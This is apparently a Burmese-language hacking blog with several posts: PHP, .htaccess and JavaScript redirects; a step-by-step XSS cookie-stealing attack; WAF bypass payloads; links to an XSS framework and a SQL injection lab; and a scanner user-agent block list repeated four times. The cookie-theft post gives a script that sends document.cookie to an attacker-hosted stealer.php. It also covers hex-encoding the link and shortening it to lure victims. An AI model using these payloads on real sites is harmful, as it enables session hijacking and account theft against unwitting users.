အေပၚမွာေဖာ္ျပထားတဲ႔ code ေလးႏွစ္ေၾကာင္းေလာက္ကုိ မိမိရဲ႔ HTML format အေပၚမွာ သြားေရာက္ျဖည္႔စြက္လုိက္ျခင္းျဖင္႔ မိမိ ညႊန္လုိတဲ႔ စာမ်က္ႏွာ(URL address) ကုိေရာက္ရွိေစႏိူင္ပါတယ္ ။ ဒီေနရာမွာ နဲနဲေလး သတိျပဳရမွာက warning အေနနဲ႔ ….

Cannot modify header information - headers already sent by ...

ဆုိတဲ႔ စာေၾကာင္းမ်ား ေပၚလာခဲ႔လွ်င္ မိမိထည္႔သြင္းလုိက္တဲ႔ code ေတြကုိ HTML tag ေတြရဲ႔အေပၚဆုံးသုိ႔ေရႊ႔ေျပာင္းထည္႔သြင္းျခင္႔ျဖင္႔ အဆင္ေျပသြားပါလိမ္႔မယ္ ။ ကဲ….ဒါဆုိရင္အျမဲတမ္းေျပာင္းေရႊ႔သြားပါျပီ ဆုိတာကုိ ဘယ္လုိေရးမလဲ ။ code status ေလးတစ္ခုကုိ ထပ္ေပါင္းထည္႔လုိက္ယုံပါပဲ…..ယာယီ redirect လုပ္ဖုိ႔အတြက္ code ေတြေနရာမွာ အျမဲတမ္း redirection ပါဆုိတဲ႔ Status Code Definition ျဖစ္တဲ႔ 301 ဆုိတာေလးကုိ မွန္ကန္ေၾကာင္း အတည္ျပဳေပးလုိက္ယုံပါပဲ ။ ဥပမာ -
<?php
header('Location: http://www.mmhackforums.com', true, 301);
exit;
?>

2.Htaccess with mod_rewrite (or) mod_alias နည္းလမ္းျဖင္႔ တည္ေဆာက္ျခင္း
ေနာက္တစ္နည္းက Apache Webserver မွာပါဝင္တဲ႔ htaccess file ကုိ အသုံးျပဳျပီး တည္ေဆာက္ျခင္းျဖစ္ပါတယ္ ။ htaccess file (hypertext access) ဆုိတာဟာ Apache Webserver ေတြအေပၚမွာ အလုပ္လုပ္ေနတဲ႔ file name ေတြ ၊ directory ေတြကုိ configure လုပ္ဖုိအတြက္ အေရးပါတဲ႔ ဖုိင္ေလးတစ္ခုပါ ။ htaccess ကုိအသုံးျပဳျပီး redirect ျပဳလုပ္ဖုိ႔အတြက္ Apache module တစ္ခုျဖစ္တဲ႔ mod_alias နဲ႔ သူ႔အတြက္ command တစ္ခုျဖစ္တဲ႔ Redirect ကုိတြဲဖက္အသုံးျပဳျခင္းအားျဖင္႔ ယာယီ redirect နဲ႔ အျမဲတမ္းအတြက္ redirect ျပဳလုပ္ျခင္းတုိ႔ကုိ ဖန္တီးႏူိင္ပါတယ္ ။ ဥပမာ- ယာယီ redirect အတြက္--
Redirect /showoff.php http://www.mmhackforums.com/tools.php
ေဖာ္ျပပါ code ကေလးကုိ htaccess file ထဲကုိ ကူးထည္႔ျပီး သိမ္းဆည္းလုိက္ျခင္းအားျဖင္႔
http://www.mmhackforums.com/showoff.php
ကေန
http://www.mmhackforums.com/tools.php
ဆုိတဲ႔လိပ္စာဆီသုိ႔ redirect လုပ္သြားပါလိမ္႔မယ္ ။ ကဲ…ဟုတ္ျပီ….ဒါဆုိရင္ အျမဲတမ္း redirect အတြက္က်ေတာ႔ေရာ ဘယ္လုိေရးမလဲ ? အေပၚမွာ status code definition ဆုိတာကုိ အနည္းငယ္ေျပာခဲ႔တယ္ေနာ္….ကြ်န္ေတာ္တုိ႔ လုပ္ခ်င္တာက အျမဲတမ္း redirect လုပ္ခ်င္တာ ၊ အျမဲတမ္း redirect ဆုိတာကုိ ေဖာ္ညႊန္းတာက code 301 ၊ ဒီေတာ႔ 301 ကုိ Redirect ဆုိတဲ႔ command ရဲ႔ေရွ႔မွာ ေခၚသုံးလုိက္မယ္ဆုိရင္ ကြ်န္ေတာ္တုိ႔ လုိခ်င္တဲ႔ အျမဲတမ္း redirect ကုိရျပီေပါ႔ ….။ ဥပမာ - အေနနဲ႔ ျပရလွ်င္..
Redirect 301 /showoff.php http://www.mmhackforums.com/tools.php
ေနာက္ထပ္ module တစ္ခုျဖစ္တဲ႔ mod_rewrite နဲ႔ ပတ္သတ္ျပီး နဲနဲေျပာၾကည္႔ပါမယ္ ။ mod_rewrite က mod_alias ထက္စာလွ်င္ ပုိျပီး powerful ျဖစ္ျပီးေတာ႔ ပုိရွဳပ္ေထြးတယ္လုိ႔ ဆုိႏူိင္ပါတယ္ ။ mod_rewrite ကုိဘယ္ေနရာေတြမွာ သုံးႏူိင္သလဲဆုိလွ်င္ domain အေဟာင္းကေန အသစ္ကုိ ေျပာင္းတဲ႔အခါမွာပဲျဖစ္ျဖစ္ www(world wide web) မဟုတ္တဲ႔ ေနရာတစ္ခုကေန www URL တစ္ခုဆီသုိ႔ redirect ျပဳလုပ္လုိတဲ႔ အခါမွာပဲ ျဖစ္ျဖစ္ အသုံးျပဳၾကပါတယ္။ ဆုိလုိတာက ကြ်န္ေတာ္တုိ႔က
http://mmhackforums.com
ကုိဝင္လုိက္ေပမဲ႔လည္း
 http://www.mmhackforums.com
ဆီကုိပဲေရာက္ရွိသြားေအာင္ ျပဳလုပ္လုိက္ျခင္းပဲျဖစ္ပါတယ္ ။ ေနာက္တစ္ခုက hotlink protect images (သုိ႔မဟုတ္) redirect based on language အစရွိတဲ႔ေနရာေတြမွာလဲ အသုံးျပဳႏူိင္ပါေသးတယ္ ။ hotlink protect images ဆုိတာနဲ႔ ပတ္သတ္လုိ႔ မိမိက ဘယ္လုိ domain ေတြကုိ ခြင္႔ျပဳမွာလဲ / ပိတ္ပင္မွာလဲ ၊ ဘယ္လုိ Referrer ေတြကုိ ခြင္႔ျပဳမွာလဲ / ပိတ္ပင္မွာလဲ ၊ ပိတ္ပင္တဲ႔ image ေတြကေရာ ဘယ္လုိ file type ( eg: jpg,png,gif,bmp,jpeg) အမ်ဳိးအစားေတြလဲ ဆုိတာေတြကုိပါ သတ္မွတ္ေပးႏူိင္ပါေသးတယ္ ။ ဒါဆုိရင္ redirect based on language ဆုိတာကေရာ ဘာလဲ ….သူကေတာ႔ လက္ရွိ မိမိ web page မွာ default အေနနဲ႔ ေဖာ္ျပေနတာက English ျဖစ္ေနျပီး chinese ဘာသာကုိေျပာင္းလဲေဖာ္ျပလုိတယ္ဆုိပါက မိမိ ေျပာင္းလုိတဲ႔ articles ကုိ ေရႊးခ်ယ္လုိက္တာနဲ႔ chinese ဘာသာကုိ ေဖာ္ျပေပးႏူိင္ေအာင္ ဖန္တီးေပးႏူိင္ပါတယ္ ။ ကြ်န္ေတာ္ Old domain တစ္ခုကေန New domain တစ္ခုဆီသုိ႔ redirect ျပဳလုပ္ပုံကုိ ဥပမာ - အေနနဲ႔ ေဖာ္ျပေပးပါမယ္….
RewriteEngine on
RewriteRule ^(.*)$ http://www.mmhackforums.com/$1 [R=301,L]
ဒီေနရာမွာ ကြ်န္ေတာ္တုိ႔က domain အေဟာင္းျဖစ္တဲ႔
http://www.mmcyberdevils.com/showoff.php
ကုိဝင္ၾကည္႔လုိက္ေပမဲ႔ တစ္ကယ္တမ္း ကြ်န္ေတာ္တုိ႔ ေရာက္သြားမွာက
http://www.mmhackforums.com/showoff.php
ပါ ။
status code ကုိ 301 နဲ႔ပါ ထပ္မံေဖာ္ျပေပးလုိက္တဲ႔ အတြက္ေၾကာင္႔ user က domain အေဟာင္းကုိ ဝင္လုိက္ေပမဲ႔လည္း အျမဲတမ္း domain အသစ္ဆီကုိပဲ redirect လုပ္ေနေတာ႔မွာပါ ။ L ဆုိတာကေတာ႔ ေနာက္ဆုံးတစ္ခုကုိ အတည္ျပဳေပးလုိက္တာပါ ။ ေနာက္ထပ္ က်န္ရွိေနတာတဲ႔ အပုိင္းျဖစ္တဲ႔ www မဟုတ္တဲ႔ domain ကေန www domain ဆီကုိ ဘယ္လုိ Redirect လုပ္ၾကမလဲဆုိတာကုိ ေဖာ္ျပပါမယ္ ။
ကြ်န္ေတာ္တုိ႔
http://mmhackforums.com
ကေန
http://www.mmhackforums.com
ဆီသုိ႔
ဘယ္လုိ redirect လုပ္မလဲဆုိတာကုိ ဥပမာ အေနနဲ႔ ေဖာ္ျပပါမယ္ ။
RewriteEngine on
RewriteCond %{HTTP_HOST} ^mmhackforums.com [NC]
RewriteRule ^(.*)$ http://www.mmhackforums.com/$1 [R=301,L]

ဒီ code ေလးေတြကုိၾကည္႔ျခင္းအားျဖင္႔ ဆုိလုိရင္းကုိ သေဘာေပါက္ေလာက္မည္ ဟု ယူဆပါတယ္ ။

3.Javascript ျဖင္႔ဖန္တီးျခင္း
ကဲ…ေနာက္ဆုံး နည္းတစ္ခုျဖစ္တဲ႔ javascript ကုိအသုံးျပဳျပီး redirect ဘယ္လုိျပဳလုပ္မလဲ ဆုိတာကုိ ေဖာ္ျပေပပါမယ္ ။
<script type="text/javascript">
window.location = "http://www.mmhackforums.com";
</script>

အထက္မွာ ေဖာ္ျပထားတဲ႔ code အခ်ဳိ႔ကုိ HTML ရဲ႔ <head> </head> tag အတြင္းမွာ ထည္႔သြင္းေဖာ္ျပလုိက္ျခင္းအားျဖင္႔ မိမိ redirect ျပဳလုပ္လုိတဲ႔ URL ဆီသုိ႔ ေခၚေဆာင္သြားပါလိမ္႔မယ္ ။ ဒီေနရာ HTML format အတြင္းမွာ ကြ်န္ေတာ္တုိ႔ အသုံးျပဳလုိက္တဲ႔ script အမ်ဳိးအစားက javascript ျဖစ္ပါတယ္ဆုိျပီး အရင္ဆုံး ေၾကျငာလုိက္ပါတယ္ ၊ အဲဒီေနာက္ window.location ဆုိတဲ႔ command ေလးကုိ အသုံးျပဳျပီး redirect လုပ္ခ်င္တဲ႔ domain ေလးကုိ ေဖာ္ေျပးေပးလုိက္ျခင္းပဲျဖစ္ပါတယ္ ။ ေကာင္းျပီ ဒါဆုိရင္ အဲဒီ domain တစ္ခုအတြင္းမွာပဲ တည္ရွိေနတဲ႔ အျခားေသာ URLs မ်ားဆီသုိ႔ေရာက္ေအာင္ေရာ ဖန္တီးလုိ႔ မရဘူးလား ၊ ရပါတယ္ ။ ဥပမာ - ၾကည္႔ပါ….

<script type="text/javascript">
window.location.replace = ("../forum/index.php");
</script>

ဒီနည္းေတြကုိ သုံးျပီး webmaster ေတြက Attacker(Hacker) ေတြကုိအာရုဏ္ေနာက္ေအာင္ ျပဳလုပ္တတ္ၾကပါတယ္ ၊ ကြ်န္ေတာ္တုိ႔ ေတာ္ေတာ္မ်ားမ်ား ၾကဳံဖူးၾကမွာပါ ။ website တစ္ခုရဲ႔ admin user & password ကုိရျပီး admin page ရွာမေတြ႔ဘူး…ဆိုျပီး ခဏခဏ ျဖစ္ၾကပါတယ္ ။ Hacker တစ္ေယာက္က joomla ဆုိဒ္တစ္ခုရဲ႔ admin user & password ရသြားျပီ ဆုိပါစုိ႔….ဒါဆုိရင္ joomla ရဲ႔ admin login page directory က
http://www.joomla.com/administrator
ဆုိတာ အားလုံးသိၾကပါတယ္ ။ ဒါေပသိ အဲဒီ administrator URL ကုိ သြားလုိက္တုိင္း
http://www.joomla.com
ကုိပဲ ျပန္ ျပန္ေရာက္သြားတတ္တာကုိ သတိျပဳမိၾကပါလိမ္႔မယ္ ၊ ဒါဟာ webmaster က သူ႔ရဲ႔ admin loing page ကုိ attacker အလြယ္တစ္ကူ ရွာမေတြ႔ေအာင္ဖြက္ထားလုိက္တာပါပဲ ။ ကဲ…ဒီေလာက္ဆုိရင္ ေတာ္ေတာ္ေလး နားလည္သြားေလာက္ျပီ( မသိေသေသာသူမ်ားကုိသာ ရည္ရြယ္သည္။) လုိ႔ ယူဆပါတယ္ ။ ကြ်န္ေတာ္ ဖတ္မိတာေလးေတြကုိ စုေပါင္းေရးသားထားျခင္းျဖစ္ပါတယ္ ၊ ကြန္နက္ရွင္ အခက္အခဲေၾကာင္႔ ပုံႏွင္႔တကြ မေဖာ္ျပေပးႏူိင္တာကုိ နားလည္ေပးၾကေစလုိပါတယ္ ။

Credit $nifferg0d (MHU)


February 8, 2014

Cookie Stealing with XSS vulnerability



အရမ္းကို အစြမ္းထက္တာမို႕ Educational Purpose Only ေပါ့ ဟိဟိ
ပထမဆံုး အေနနဲ႕လုိအပ္တာေတြကို အရင္စုေစာင္းလိုက္ပါဦး
Requirements:
1.XSS vulnerable site
2.Cookie stealer code (download)
3.Free web hosting account
4.XSS အေျခခံ
5.Cookie အေၾကာင္းအေျခခံ
 ဒါေတြအားလံုးစံုၿပီဆိုရင္ ဆက္သြားမယ္။

Step 1# Cookie Stealer တစ္ခုဖန္တီးမယ္
Code ကို အေပၚက ေပးထားတဲ့ လင့္မွာေဒါင္းထားတယ္ေနာ္
1.အဲ့ code ကို copy ကူး
2.ပီးရင္ notepad ထဲမွာ paste လုပ္
3.အဲ့ဟာကိုမွ stealer.php ဆိုပီး save လိုက္
အိုေက ေနာက္တခုက notepad အသစ္တစ္ခုဖြင့္ၿပီး log.txt ဆိုပီး save လိုက္ ။ဘာမွမပါတဲ့ file ေနာ္
(ေနာက္တခု အေရးႀကီးတာက နာမည္မေျပာင္းပါနဲ႕)ဘာလို႕လဲဆို stealer က cookie ေတြ ip address information ေတြကို
ဒီမွာ save မွာျဖစ္လို႕ပါ
ဒါဆို ခု က်ေနာ္ တို႕မွာ stealer.php ရယ္ log.txt ဆိုပီး file ၂ခု ရပီ

Step 2#
web hosting တစ္ခုခုမွာ register လုပ္ထားၿပီးၿပီဆိုရင္ Cpanel ထဲက File Manager ကိုသြားမယ္
ၿပီးရင္ root ေအာက္မွာ ျဖစ္ျဖစ္ public_html ေအာက္မွာဘဲျဖစ္ျဖစ္ stealer.php နဲ႕ log.txt ကို သြားတင္လိုက္ပါ
ဒါဆိုရင္ က်ေနာ္တို႕ stealer က http://www.host.com/stealer.php အေနနဲ႕ ျဖစ္သြားၿပီ

Step 3#Exploiting the XSS vulnerability
ေအာက္က code ကိုက်ေနာ္ တို႕သြားထည့္မယ္ ဘယ္ေနရာထည့္ရမယ္ဆိုတာေတာ့ သိရမယ္ေနာ္
CODE:
<script>location.href = 'http://www.host.com/Stealer.php?cookie='+document.cookie;</script>
ဒါပါဘဲ

Cookie Stealing with persistance & non-persistance

Persistance ဆိုတာ က်ေနာ္တို႕ ေစာေစာ ကလို code ကို inject လုပ္တဲ့အခါမွာ Admin က ဒီလင့္ကို ျမင္တဲ့ အခ်ိန္ထိ အဲ့ဆိုက္မွာ ရွိေနမယ္
Intruder ေတြအေနနဲ႕ ဘယ္link မွလိုက္ပို႕ေနစရာမလိုဘူး ဒီဆိုက္ကို ၀င္လာတဲ့ user အားလံုးဟာ victim ဘဲ

Non-persistance က်ေတာ့သူ႕လိုမဟုတ္ဘူး Intruder ေတြက victim ဆီကို link လိုက္ပို႕ေပးရတယ္။victim ေတြ ၀င္ေတာ့မွ cookie ကိုခိုးနိုင္မယ္
ဆိုက္အမ်ားစု ကေတာ့ non-persistance ျဖစ္ၾကတာမ်ားပါတယ္
ဒီေတာ့ non-persistance အေၾကာင္းဘဲဆက္ေျပာစရာရွိတယ္ ေပါ့ေနာ္
အေပၚက အတိုင္းလုပ္ထားတဲ့ link ဟာေအာက္မွာျပထားတဲ့ အတိုင္းျဖစ္ေနမွာပါ
http://www.vulsite.com/search?param=<script>locကation.href = 'http://www.host.com/Stealer.php?cookie='+document.cookie;</script>
ေနာက္မွာ script ေတြပါေနတာ ကို Intruder ကေန hex တန္ဖိုးေျပာင္း လိုက္နိင္ပါတယ္
ဒီလိုဆို ေအာက္ကလိုမ်ိဳးျဖစ္သြားမယ္
http://www.vulsite.com/search?param=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f
%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%
75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63
%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b
%3c%2f%73%63%72%69%70%74%3e


အရမ္းရွည္ေနျပန္တယ္ ဒီေတာ့ tiny url လိုေနရာမ်ိဳးမွာ သြားခ်ံဳ႕လိုက္မယ္ဆိုရင္
ေအာက္ကလိုျဖစ္သြားမယ္
http://www.tinyurl.com/tw3d5

ဒီ link ကို victim က တခ်က္နွိပ္လိုက္တာနဲ႕ log.txt ဆိုတဲ့ ဖိုင္မွာ cookie ေတြကို save ၿပီးသားျဖစ္သြားမယ္

ေက်းဇူးအထူးတင္ပါတယ္ ေညာ္
Credit to breakthesecurity
Regards 4Rd4m-injector(MSF)

Bypassing Technique for XSS

XSS အေၾကာင္းေတာ့ ေရးထားၿပီးၿပီ
ခုအခန္းက XSS မွာ WAF (web application firewall) ကို ဘယ္လို ေက်ာ္မလဲဆိုတာ ေပါ့။
အတိုဆံုး intro ၀င္ရမယ္ဆိုရင္ ေတာ့ XSS မွာလည္း SQL တုန္းကလို မ်ိဳး WAF ေတြေက်ာ္ရတာရွိတယ္ေပါ့ဗ်ာ
ဒီေတာ့ အဲလိုႀကံဳလာခဲ့ရင္ ဒီက်ဴတိုေလးဖတ္ၿပီးေျဖရွင္းၾကတာေပါ့
စေဖာမယ္
Method 1# Bypassing magic_quotes_gpc
magic_quotes_gpc=ON ထားတယ္ဆိုတာက php setting တစ္ခုဆိုပါေတာ့
သူက ဘာလုပ္လဲဆိုေတာ့ '(single quote),"(double quote) ေတြကို \(backslash) အျဖစ္ေျပာင္းလိုက္တယ္
ဆုိၾကပါစို႕ က်ေနာ္ တို႕က <script>alert("revolt!");</script> ကို run မယ္ဆိုပါေတာ့
<script>alert(\revolt!\)</script> ဒီလိုျဖစ္သြားတဲ့ အတြက္က်ေနာ္ တို႕ code ေတြ အလုပ္မလုပ္ေတာ့ဘူး
ဒီေတာ့ က်ေနာ္ တို႔က အဲဟာကို bypass လုပ္မယ္ <script> ၂ ခုၾကားထဲက စာေတြအားလံုးကို
ASCII value ေတြေျပာင္းရမယ္
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 114, 101, 118, 111, 108, 116, 34, 41, 59) ဒီလိုပံုစံမ်ိဳးေပါ့
code အျပည့္အစံုက ေတာ့ဒီလိုျဖစ္သြားမယ္
http://www.site.com/search?param=<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 114, 101, 118, 111, 108, 116, 34, 41, 59)</script>
က်ေနာ္တို႕ASCII ကိုဘယ္လိုေျပာင္းမလဲ?
alert("revolt!");
ဒါက က်ေနာ္ လိုခ်င္တဲ့ value ဆိုပါေတာ့
Hack bar addon ေတာ့လိုပါတယ္
ေအာက္ကပံုေတြၾကည့္ရင္နားလည္မယ္ထင္ပါတယ္
 step:1
step:2
step:3

Method 2#Hex Encoding
ေနာက္တစ္နည္းကေတာ့ Code တစ္ခုလံုးကို hex encoded လုပ္ထားရင္လည္း WAF ေတြ filter မလုပ္နိုင္ပါဘူး
3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%72%65%76%6f%6c%74%22%29%3b%3e%2f%73%63%72%69%70%74%3e
ဒီလိုမ်ိဳးေပါ့
code အျပည့္အစံုက ဒီလုိျဖစ္သြားမယ္
http://www.site.com/search?param=3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%72%65%76%6f%6c%74%22%29%3b%3e%2f%73%63%72%69%70%74%3e

hex တန္ဖိုးကုိေတာ့ here သြားေျပာင္းနိုင္ပါတယ္

Method 3# Bypass using Obfuscation
တခါတေလ script ,alert တို႕ကို filter လုပ္ထားျပန္ေရာ
အဲ့ခါက် <ScRipt>ALeRt("revolt");</ScRipt> ဒီလိုလုပ္လိုက္မယ္
Obfuscation ဆိုတဲ့အတိုင္း ဇေ၀ဇ၀ါေတြလုပ္ျပစ္တာေပါ့(dictionary ဖတ္လိုက္တာ)

Method 4# Bypass using closing tag
ေနာက္ဆံုးနည္းေလးက ေတာ့
> ဒါေလးကို ေရွ႕မွာ ထည့္လိုက္တာဘူး
ဒီေနရာေတာ့ က်ေနာ္ လည္းသိပ္ေတာ့မရွင္းဘူး ထင္တာေျပာရမယ္ဆိုရင္ေတာ့
က်ေနာ္ ေက်ာင္းမွာ javascript သင္ရတုန္းက !--> လိုမ်ိးေလး ေတြ႕ဘူးတယ္
ဆရာမ ေျပာတာေတာ့ old browser ပိတ္တဲ႕ အဖြင့္ဆိုလားဘဲ ဟိဟိ တိဘူး
ေနာက္ဆံုးက်ေနာ္ တို႕ code ကဒီလိုျဖစ္သြားမယ္
http://www.site.com/search?param="><script>alert("revolt")</script>
ေက်းဇူးတင္ပါတယ္ ခညာ




How to use Xenotix XSS payload framework


က်ေနာ္ ေတာ့စမ္းမၾကည့္ရေသးပါဘူး
hackw0rm ကေနျပန္ရွဲထားတာပါ
ေနာက္ပိုင္းစမ္းပီးရင္ေတာ့ ျမန္မာ လိုေရးေပးပါ့မယ္
ခုေတာ့ tool ေဒါင္းလုိက္ပါဦး
E လိုေရးထားတဲ့ PDF ပါေဒါင္းထားလိုက္ ေပါ့
Tools Download:Here
PDF Download:Here

February 6, 2014

SQL Injection ကို Local မွာစမ္းၾကမယ္

က်ေနာ္တို႕ ေလ့က်င့္တဲ့အခါမွာ online မရွိလို႕ဘဲျဖစ္ျဖစ္ vul ဆိုက္ေတြရွာရမွာ ပ်င္းလို႕ဘဲျဖစ္ျဖစ္
အေၾကာင္းအမ်ိဴးမ်ိဴးေၾကာင့္ေပါ့ေလ
Local မွာဘဲ စမ္းခ်င္တယ္ဆိုတဲ့ ကိုကို မမ ေတြအတြက္ က်ေနာ္ သြားမလာတာပါ

ဒီမွာ ပါ၀င္တဲ့ အခန္းေတြကေတာ့
  1. Error Based Sql Injections - Union select type.
  2. Error Based Sql Injections - Double Query type.
  3. Boolian Based Blind Injections.
  4. Time Based Blind Injections.
  5. Dumping the DB using outfile / Dumpfile.
  6. POST based Sql injections Error based type - union select.
  7. POST based Sql injections - Double injection type.
  8. POST based Blind injections -Boolian / Time based.
  9. Injection in the UPDATE query.
  10. Injection in the Headers.
  11. Injection in cookies.
ဒါေတြပါ၀င္မယ္ ။
လိုခ်င္ရင္ေတာ့ ဒီ download link မွာ သြားေဒါင္းနုိင္ပါတယ္။
က်ေနာ္ ကိုယ္တိုင္လည္းေလ့လာမွာျဖစ္တဲ့အတြက္ အေျဖေတြကို ပါ ေနာက္ပိုင္း ရွင္းျပမယ္ လို႕ ရည္ရြယ္ထားပါတယ္
ေက်းဇူးတင္ပါတယ္ ေညာ္

February 5, 2014

သင့္ရဲ႕ website ကို scanner ေတြရန္ကဘယ္လိုကာကြယ္မလဲ?

က်ေနာ္ စာမေရးျဖစ္တာၾကာသြားၿပီ
ခုတင္တဲ့က်ဴတိုက ေတာ့ ကိုယ့္ရဲ႕ website ကို accunetix တို႕ Nesus တို႕ ရန္ကေနကာကြယ္တဲ့နည္းေလးပါ က်ေနာ္ ရွာေတြ႕တာလားဆိုေတာ့ မဟုတ္ပါဘူး
ဟုိရွာဒီရွာနဲ႕ ေတြ႕ထားတာေလးပါ။မခက္ပါဘူး
ေအာက္က code ေလးကို သင့္ website ရဲ႕ .htaccess မွာ သြားထည့္လိုက္ယံုပါဘဲ
RewriteEngine On
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} ^w3af.sourceforge.net [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwhisker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
RewriteCond %{HTTP:Acunetix-Product} ^WVS
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule> - See more at: file:///D:/Block%20your%20website%20from%20scanners%20%20%20Hack%20For%20Security.htm#sthash.k9mkGGZV.dpuf

RewriteEngine On
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} ^w3af.sourceforge.net [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwhisker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
RewriteCond %{HTTP:Acunetix-Product} ^WVS
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule> - See more at: file:///D:/Block%20your%20website%20from%20scanners%20%20%20Hack%20For%20Security.htm#sthash.k9mkGGZV.dpuf

RewriteEngine On
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} ^w3af.sourceforge.net [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwhisker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
RewriteCond %{HTTP:Acunetix-Product} ^WVS
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule> - See more at: file:///D:/Block%20your%20website%20from%20scanners%20%20%20Hack%20For%20Security.htm#sthash.k9mkGGZV.dpuf
RewriteEngine On
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} ^w3af.sourceforge.net [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwhisker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
RewriteCond %{HTTP:Acunetix-Product} ^WVS
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule> - See more at: file:///D:/Block%20your%20website%20from%20scanners%20%20%20Hack%20For%20Security.htm#sthash.k9mkGGZV.dpuf